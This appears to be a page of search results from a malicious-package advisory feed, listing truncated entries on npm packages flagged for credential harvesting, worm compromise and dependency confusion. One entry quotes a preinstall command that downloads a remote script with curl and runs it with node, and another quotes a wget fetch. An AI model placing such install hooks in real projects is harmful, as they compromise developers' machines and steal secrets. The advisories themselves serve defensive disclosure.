194 matches found
Malicious code in crossmint-wallets-sdk (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dd4caebfba35b43bf10f156fe687f455e95b09a514b8644fe1a900b63f1bf78a Package name impersonates the Crossmint wallet SDK family. Both preinstall.js and index.js import childprocess, capture host identifiers hostname is...
Malicious code in react-dynammic-table-component (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d47aff9bb18dcd61350fa86e19d97ddee5ee7c5bdf7f0adea4a685e89d58fa4f [email protected] declares a preinstall lifecycle script node dist/setup.js that runs automatically on npm install. The script...
MAL-2026-6491 Malicious code in hexo-deployer-wrangler (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ebc95a6a1ae1e522feabf03446f9791372191e27ca9da454717559b6cc6948eb The package ships a binding.gyp file line 6 containing GYP command-expansion syntax !... inside the targets/sources fields. npm implicitly runs...
Malicious code in gx-npm-ui (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 04e5ac6b8b24f2c158c37d3d6ac268bbf7f472433660064491538ee468cfcfcb Package published at version 99.99.99 under the gx-npm- namespace, a shape designed to win npm version resolution against private internal packages o...
Malicious code in leo-logger (npm)
The leo-logger npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...
MAL-2026-6428 Malicious code in leo-cron (npm)
The leo-cron npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...
Malicious code in date-format-helper2 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 66c1775ce65ad47476ee1a0f1c7c5373e61466ec3eb4543cc658e67d2de22960 Package is advertised as a React date-formatting utility, but its postinstall.js performs targeted credential harvesting on npm install. The script...
MAL-2026-6301 Malicious code in date-format-helper2 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 66c1775ce65ad47476ee1a0f1c7c5373e61466ec3eb4543cc658e67d2de22960 Package is advertised as a React date-formatting utility, but its postinstall.js performs targeted credential harvesting on npm install. The script...
MAL-2026-6295 Malicious code in kdrive-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3e7d5af5ddf22d4481fca4847a45189e6160a723341b32dcbb6bf51b49f53943 package.json declares a preinstall lifecycle script that auto-executes on npm install and runs wget -q -O-...
MAL-2026-5982 Malicious code in metrics-probe-77d4 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1d079b30dbb30db1a61acddcd094d2e7e67e7ef466d624e4ad2392edc9d9203e On install, package.json runs postinstall: node run.js. run.js imports os, fs, http, https, and childprocess and at runtime collects host identifiers...
MAL-2026-5784 Malicious code in vaults-monitor-cron (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b81c6b9e59e86c40858cb47e91d597b3776fea71def7feb3ca11833625fa3923 On npm install, the package's preinstall hook node postinstall.js || true executes automatically. The script collects hostname, username, and current...
MAL-2026-5779 Malicious code in hemi-supply-cron (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c41be27601d38eb5c0b527a9ec22b7516734e8eae985a2607ae6d70878f5f1d9 package.json declares a preinstall hook node postinstall.js that fires automatically on npm install. The script collects host identity os.hostname,...
Malicious code in vault-strategies (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6b7037d9efc65a0885cc000a92c46ea9bed2097d02c8fb2883ceaa3eb2fd5eeb On npm install, the package's preinstall hook preinstall: node postinstall.js || true executes postinstall.js, which enumerates process.env and filte...
MAL-2026-5758 Malicious code in npm-sandbox-research-8b2f (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 916280d3906e0f04caa7f46135039e4a42b03a5c96091c1555ad2ab0e86b923b On install, package.json runs postinstall: node run.js, which loads beacon scripts beacon8.js, beaconlinux.js that import childprocess, os, and http,...
Malicious code in node-stack-frames (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5fd4f6c5f3278484d99f6ffffc001cf920dcb0fa4fdfabff957a61c3cfbfc158 package.json declares a preinstall script that runs an inline Node program on npm install. The script requires os and http, collects os.hostname,...
MAL-2026-5723 Malicious code in @ci-lifecycle-test/postinstall-ping (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 75c160ad40a237c1e682c696ebd0aec2861ca072f47bd5b725bc80f7f95ed509 The package's postinstall lifecycle script postinstall.js executes automatically on npm install and POSTs the JSON-serialized contents of the entire...
Malicious code in warp-dependency (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 493b3ed30d94fb482e4b9c7cf3d328ba9b307f91965783f0024ec7dca1fedb96 [email protected] declares postinstall: node index.js in package.json. The index.js entry point is heavily obfuscated using obfuscator.io-style...
MAL-2026-5712 Malicious code in jextic-eclib (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 13a6476409b9cb9296b7f778be375081c8ad12b030658351092e9fef90f4b707 On npm install, the package's postinstall hook postinstall.js requires index.js, whose top-level scanAndExfiltrate call walks the installer's working...
Malicious code in eslint-plugin-mistica-local-rules (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c1d21f50741178986b63d1f330373131c2f3f502a5b94e76ca921ce185fab123 package.json declares a preinstall hook that runs index.js automatically on npm install. index.js collects host identity os.hostname, os.platform,...
MAL-2026-5645 Malicious code in sn-internal-test (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install...